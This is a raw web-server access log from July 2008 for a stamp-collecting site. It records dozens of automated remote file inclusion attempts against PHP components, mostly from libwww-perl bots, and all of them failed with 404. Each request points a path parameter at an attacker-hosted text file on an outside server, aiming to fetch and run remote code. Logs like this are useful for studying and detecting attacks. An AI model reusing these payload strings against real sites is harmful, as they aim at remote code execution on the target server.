194.201.253.2 - - [27/Jul/2008:19:30:39 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:19:30:41 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:32:04 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:32:06 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.68.170 - - [27/Jul/2008:19:32:41 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:33:31 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
219.111.8.239 - - [27/Jul/2008:19:35:38 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
219.111.8.239 - - [27/Jul/2008:19:35:38 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
218.188.33.2 - - [27/Jul/2008:19:36:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
218.188.33.2 - - [27/Jul/2008:19:36:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
216.199.200.75 - - [27/Jul/2008:19:37:50 -0700] "GET /logs/access_080317.log//modules/vwar/admin/admin.php?vwar_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.199.200.75 - - [27/Jul/2008:19:37:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.199.200.75 - - [27/Jul/2008:19:37:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.9.157.85 - - [27/Jul/2008:19:37:55 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://l1nuxgroup.by.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:39:50 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:39:50 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:39:51 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.157.85 - - [27/Jul/2008:19:39:59 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://l1nuxgroup.by.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:19:40:33 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:41:07 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:41:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:41:08 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:41:10 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:41:11 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:41:11 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:42:47 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:19:43:47 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:19:43:47 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:19:43:47 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:19:43:53 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:19:43:53 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:19:43:53 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:19:43:55 -0700] "GET /logs/access_080623.log//include/lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:19:43:55 -0700] "GET //include/lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:19:43:55 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:19:44:01 -0700] "GET /logs/access_080505.log//newspublish/include.php?path%5Bdocroot%5D=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:44:30 -0700] "GET /logs/access_080505.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:19:44:39 -0700] "GET /logs/access_080505.log//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:19:44:41 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:45:13 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:45:13 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:45:13 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:19:46:02 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:19:46:05 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:19:47:01 -0700] "GET /logs/access_080512.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:19:47:01 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:19:47:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:19:47:28 -0700] "GET /logs/access_080331.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.9.157.85 - - [27/Jul/2008:19:47:40 -0700] "GET /logs/access_080623.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://l1nuxgroup.by.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.9.157.85 - - [27/Jul/2008:19:47:40 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://l1nuxgroup.by.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:48:15 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:48:15 -0700] "GET /logs/access_080616.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:48:15 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:48:15 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:48:16 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:48:16 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:48:21 -0700] "GET /logs/access_080421.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:48:21 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:48:28 -0700] "GET /logs/access_080421.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:48:29 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:48:30 -0700] "GET /logs/access_080616.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:48:30 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:49:27 -0700] "GET /logs/access_080602.log//admin/classes/TplLoad.php?full_path_to_public_program=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:49:27 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:19:49:37 -0700] "GET /logs/access_080616.log//admin/classes/TplLoad.php?full_path_to_public_program=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:50:00 -0700] "GET /logs/access_080602.log//admin/classes/TplLoad.php?full_path_to_public_program=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:50:00 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:19:50:06 -0700] "GET /logs/access_080505.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:19:50:16 -0700] "GET /logs/access_080616.log//admin/classes/TplLoad.php?full_path_to_public_program=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
72.9.157.85 - - [27/Jul/2008:19:50:37 -0700] "GET /logs/access_080512.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://l1nuxgroup.by.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:19:52:17 -0700] "GET /logs/access_080602.log//include/lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.22.104 - - [27/Jul/2008:19:54:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.22.104 - - [27/Jul/2008:19:54:33 -0700] "GET /logs/access_080526.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:19:56:30 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:19:57:49 -0700] "GET /logs/access_080512.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:19:57:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:19:57:49 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:19:58:32 -0700] "GET /logs/access_080512.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:19:58:33 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:19:58:33 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:19:58:38 -0700] "GET /logs/access_080331.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:19:59:32 -0700] "GET /logs/access_080331.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.138.159.164 - - [27/Jul/2008:19:59:58 -0700] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
193.138.159.164 - - [27/Jul/2008:19:59:58 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:20:00:29 -0700] "GET /logs/access_080331.log//payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:20:00:30 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:20:00:30 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:20:02:26 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:20:02:28 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:20:02:29 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:20:06:15 -0700] "GET /logs/access_080331.log//payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:20:06:15 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:20:06:16 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:20:06:21 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:20:06:22 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:07:24 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:07:24 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:07:25 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:07:25 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:07:30 -0700] "GET /logs/access_080421.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
